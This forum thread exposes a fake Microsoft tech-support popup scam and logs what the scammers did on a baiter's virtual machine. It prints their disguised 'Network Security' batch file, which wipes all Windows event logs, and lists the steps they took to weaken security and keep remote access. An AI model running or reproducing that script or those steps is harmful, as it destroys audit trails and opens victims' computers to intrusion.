Microsoft Popup Scam +1-(855)-949-0471

Scams
1

1747×938 287 KB

Link: https://domain343698.online/768/483957629/errorlist/093958356/7352305285/errorreport/x00EdsjsjhsOkhkasdVX0/

appears to be a working number of an Indian tech support call center
2

Thanks for the number! This was my first longer scam bait call, and I could keep them busy for more than one hour with a textnow number :slight_smile: I said I was a farmer, got a new computer just last week. They did the usual thing with “tree” and then even created an eMail account and Paypal account for me.

Then they tried to send money with my credit card, a $1 burner card I bought somewhere on the internet, and surprisingly it didn't work. So they forwarded me to the page microsofttechs.com and entered all my fake address data and credit card number to it, I guess for some other processing method. Screenshot:
https://i.imgur.com/E08m7T3.png
Now they are on my VM and wasting more time with all the "security fixes", they said they will need 30-45 minutes. I'm recording a video of it. But looks half decent what they do, installing ad-block etc. Of course, still a scam how they get their customers, and I should pay $325, outrageous! :-)

3

@marilynbaiter#121827 always try to find out as much as possible such as their company websites, their company name etc. That was a good bait!

4

Will try to get more information next time, was a bit nervous. They are done now on my VM. They said they will disconnect, we said goodbye and phone call ended, but these scammers were still on my VM! I pretended to read some news for minutes, while they were happily watching. Then I disconnected it from my side.

The video is encoding now what they all did, will upload it later. They installed a few freeware programs and cleaned temporary files, and installed their number in the taskbar. At one point they even ejected my Oracle VM Guest Additions CD, oops :-)

They sent a "medicine2.txt" file to my desktop at the end and showed me 2 more numbers: 1888-604-3357 and 1800-291-7147. But might only work for registered customers. I guess the "lifetime" support lasts only until they disable the toll free numbers. Contents of the medicine file, with an eMail contact, which might provide more information about their company, geekswebllc.com:

  • * All the securities and updates have been installed, its up to date.

  • * Your Computer is working fine and faster then before.
  • * Our working hours are 10:00 AM to 08:00 PM CST.
  • * We work from Monday to Friday. We are off on Saturday and Sunday.
  • * If you face any issue on weekends then you could mail us on [email protected].
  • * Your computer will be under observation for a week so that you dont face any issue in future.
  • * If you`re not satisfied with the work then you are requested to call us and ask for refund.
  • * Our toll free number is 1888-604-3357 / 1800-291-7147.
  • * You`ll be getting a call for feedback from Manager within next 24 to 48 hours.
    • 5

    Here is the video what they did:

    https://www.youtube.com/watch?v=uRX1wgNdkcI

    I would say it is better than grandson quality :-) but they probably wouldn't know what to do if there were a real problem and not just their fake popup. And I didn't notice it the first time, but they uninstalled Teamviewer! I installed it together with some other programs from https://ninite.com to make the VM look a bit more legit. I guess they don't want that other scammers who use Teamviewer are getting on my computer. And they told me if I would see this popup again, I should only call their number, not the number on the popup :-)

    I have still the VM. Let me know if someone wants some of the other files they transferred before I reset it to the last checkpoint. They want to call me again tomorrow, they will probably complain about the credit card. Anything more I could do?

    This is the content of the "Network Security" batch file:

    @echo off
    FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
    IF (%adminTest%)==(Access) goto noAdmin
    for /F "tokens=*    " %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
    echo.
    echo goto theEnd
    :do_clear
    echo clearing %1
    wevtutil.exe cl %1
    goto :eof
    :noAdmin
    exit

    6

    Their alternate # 800-642-3079 (as seen on microsofttechs.com)

    Good news, a good Samaritan hacked their VM 800-642-3079

    7

    I did the work an reviewed my video in detail, to see what they did. TL;DR: except for installing the popup and ad blocker and removing some temporary files, they didn’t do anything useful, and many things were even harmful and intended to lower the security of the computer, and to make future scams more easier. Definitely not worth the requested $325. So I take it back, it was less than grandson quality. But if someone doesn’t know much about computers, it might look impressive.

    Detailed log:

  • - downloading https://www.supremocontrol.com/public/download/Supremo.exe

  • - changing User Account Control Settings: "Never notify", not recommended
  • - installing Supremo, setting up unattended remote access so that they can login whenever they want without me noticing
  • - installing "Popup Blocker Pro" extension in Chrome
  • - disabling the following programs from the next startup on next boot which I installed: Avira (anti virus), Microsoft OneDrive, Spotify, VirtualBox Guest Addtions (oops)
  • - chainging the mouse speed to fastest possible (what the heck?!)
  • - disabling all services, except "GoToAssist Remote Support", "Supremo" and the Avira services
  • - changing the screensaver: from the default, turn off after 10 minutes, to turn off never (hmm, they are not very green people)
  • - removing the SmartScreen message warning (a program from Microsoft to warn about running unrecognized apps downloaded form the internet)
  • - restore default for folder options (probably to avoid that I see file extensions, which I usually enable in my Windows installations)
  • - disabling all Windows Security and Maintenance messages (that's another way to solve problems. If I don't see them, then there are no problems, cool)
  • - Changing Internet Properties: selecting "Always open pop-ups in a new tab", disabling Pop-up Blocker (why would they do this, but in Chrome install a popup blocker? Dumb)
  • - looking at my system information (4 GB RAM) and then changing the paging file size from automatically to 4 GB min. and 8 GB max. in the system settings
  • - uninstalling TeamViewer, which I installed
  • - terminating the TeamViewer task in the Task Manager, to be sure nobody else is on my computer (they were using GoToAssist)
  • - finally terminating the Microsoft Edge browser with the Task Manager, which showed the scam popup
  • - removing their support phone number from the taskbar
  • - creating a new taskbar entry, which shows their support phone number (was the same, stupid guy, just following a script)
  • - downloading and installing Adblock Plus
  • - removing all my pending downloads in Microsoft Store (which Microsoft does on their own, I didn't start them, like garbage as Candy Crush etc.)
  • - deleting temporary files
  • - ejecting the Oracle VirtualBox Guest Additions CD (oops)
  • - starting Internet Explorer, selecting "Don't use recommended settings" for the secuirty setting, instead of the other option "SmartScreen"
  • - installing Adblock Plus again
  • - deleting more temporary files
  • - starting "ping google.com -t", so that it pings google.com in a command shell continuosly (I guess to make it look more teccy. This was at minute 25 in the video)
  • - changing tablet mode setting from "Always ask me before swtiching" to "Don't ask me and don't switch" (maybe this is done to generate more support calls, if this switching doesn't work)
  • - changing table mode setting from "Use the appropriate mode for my hardware" to "Use desktop mode"

    • It went on a bit slow from this point on, maybe he was getting some coffee.

  • - transferring the following files from his PC to my PC with GotoAssist: Cleanup.exe, Medicine2.txt, Security.bat, Cleanup.exe again, because he messed up the upload directory

  • - starting Cleanup.exe. It deletes a lot more temporary files, needed 7 minutes while he restored and minimized the ping window and task manager
  • - running the Security.bat file as admin, which apparently deleted some more files or registry entries, needed about 2 minutes
  • - doing nothing for like 15 minutes, but CPU usage in the task manager was spiking to 100% after some time for a minute, maybe they did something in the background which was not recorded?
  • - again after 10 minutes, minute 52 in the video, I got called and the guy showed me the Medicine2.txt file

    • At minute 55 we said goodbye and the telephone call was ended, but he was still connected with GoToAssist, spying on what I was doing! I was pretending to surf the web for 5 minutes, no disconnect, finally I disconnected GoToAssist

    I did restart the VM after this, and as expected, the Avira anti-virus main program was not running anymore. But some Avira services were still running. Maybe there will be no updates without the main program.